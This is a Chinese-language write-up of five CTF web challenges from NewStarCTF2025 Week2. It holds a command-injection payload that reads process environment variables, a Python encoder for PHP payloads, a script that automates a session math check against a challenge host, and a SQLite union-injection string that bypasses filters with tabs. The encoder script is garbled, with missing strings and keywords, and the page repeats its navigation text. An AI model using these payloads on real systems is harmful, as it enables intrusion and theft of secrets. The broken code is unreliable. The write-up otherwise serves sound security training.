NewStarCTF2025 Week2 Web 题目解析

记录了 NewStarCTF2025 Week2 Web 赛道的五道题目解题过程。涉及环境变量泄露、自定义加密（Atbash+Rot13+Base64）、动态 Session 数学验证、文件包含及前端绕过、SQLite 联合注入等知识点。提供了相应的 Python 脚本和 Payload 示例。

moshang发布于 2026/4/6更新于 2026/4/1812 浏览

1、DD 加速器

文章配图

在环境变量里

Payload：;cat /proc/self/environ

文章配图

2、真的是签到诶

需要对 payload 进行一些加密处理和替换，CyberChef 可以直接处理。这里用 Python 实现。

Exp：

#!/usr/bin/env python3
import base64, codecs, sys

def atbash(text: str) -> str:
    result = []
    for ch in text:
        if 'A' <= ch <= 'Z':
            base = ord('A')
            offset = ord(ch) - base
            new = chr(base + (25 - offset))
            result.append(new)
        elif 'a' <= ch <= 'z':
            base = ord('a')
            offset = ord(ch) - base
            new = chr(base + (25 - offset))
            result.append(new)
        else:
            result.append(ch)
    return ''.join(result)

def make_cipher(php_code: ) -> :
    rot = codecs.encode(php_code, )
    atb = atbash(rot)
     base64.b64encode(atb.encode()).decode()

 __name__ == :
     (sys.argv) > :
        php_code = .join(sys.argv[:])
    :
        php_code = ()
    cipher = make_cipher(php_code)
    ( + cipher)
    ()
    (.(cipher))

相关免费在线工具

加密/解密文本
使用加密算法（如AES、TripleDES、Rabbit或RC4）加密和解密文本明文。在线工具，加密/解密文本在线工具，online
curl 转代码
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。在线工具，curl 转代码在线工具，online
Base64 字符串编码/解码
将字符串编码和解码为其 Base64 格式表示形式即可。在线工具，Base64 字符串编码/解码在线工具，online
Base64 文件转换器
将字符串、文件或图像转换为其 Base64 表示形式。在线工具，Base64 文件转换器在线工具，online
Markdown转HTML
将 Markdown（GFM）转为 HTML 片段，浏览器内 marked 解析；与 HTML转Markdown 互为补充。在线工具，Markdown转HTML在线工具，online
HTML转Markdown
将 HTML 片段转为 GitHub Flavored Markdown，支持标题、列表、链接、代码块与表格等；浏览器内处理，可链接预填。在线工具，HTML转Markdown在线工具，online

cipher=dW91dGlhKCd0bWske0VIVX0vaConKTs=

import requests
import re
import warnings
import time

warnings.filterwarnings("ignore", message="Unverified HTTPS request")
BASE_URL = "https://eci-2zeiq1qx3sfyu0wmkq2l.cloudeci1.ichunqiu.com:5000"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Referer": BASE_URL + "/",
}
COOKIES = {
    "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1758870051,1759023301,1759045200,1759196465",
    "session": ".eJxNy0EKwyAQQNG7zNpFoikTXfceIu1ghFHDZIRC6N3b7LL-_53w2hIztUyxDtaycyGB4NEuaG7x0CQatVSCMOPDo5ucm-_Hp_8dLpNfrTPAPWd6x9IgqAwyMA6Sli4Ozy4dvj8rJSkm.aONamw.-1Fr7-rum_bnGpnzrcLjL6Z1mqc"
}

def fast_challenge():
    with requests.Session() as s:
        # 1. 获取 challenge JSON
        r = s.post(BASE_URL + "/start_challenge", headers=HEADERS, cookies=COOKIES, verify=False)
        r.raise_for_status()
        data = r.json()  # 直接解析 JSON
        expr = data["expression"]
        # 2. 提取数字
        match = re.search(r'\((\d+)\s*\*\s*(\d+)\)\s*\^\s*0x([0-9a-fA-F]+)', expr)
        if not match:
            raise ValueError("无法解析 expression")
        a, b, c = match.groups()
        token_value = (int(a) * int(b)) ^ int(c, 16)
        # 3. 立即提交 token
        r2 = s.post(BASE_URL + "/verify_token", json={"token": token_value}, headers=HEADERS, cookies=COOKIES, verify=False)
        print(r2.status_code, r2.text)

if __name__ == "__main__":
    fast_challenge()

?id=0%09union%09select%09*%09from%09(select%091)a%09join%09(select%092)b%09join%09(select%093)c%09join%09(select%094)d%09join%09(select%09config_value%09from%09sys_config)e

NewStarCTF2025 Week2 Web 题目解析

1、DD 加速器

2、真的是签到诶

更多推荐文章

相关免费在线工具

3、搞点哦润吉吃吃橘

4、白帽小 K 的故事（1）

5、小 E 的管理系统

NewStarCTF2025 Week2 Web 题目解析

1、DD 加速器

2、真的是签到诶

微信扫一扫，关注极客日志

更多推荐文章

相关免费在线工具

3、搞点哦润吉吃吃橘

4、白帽小 K 的故事（1）

5、小 E 的管理系统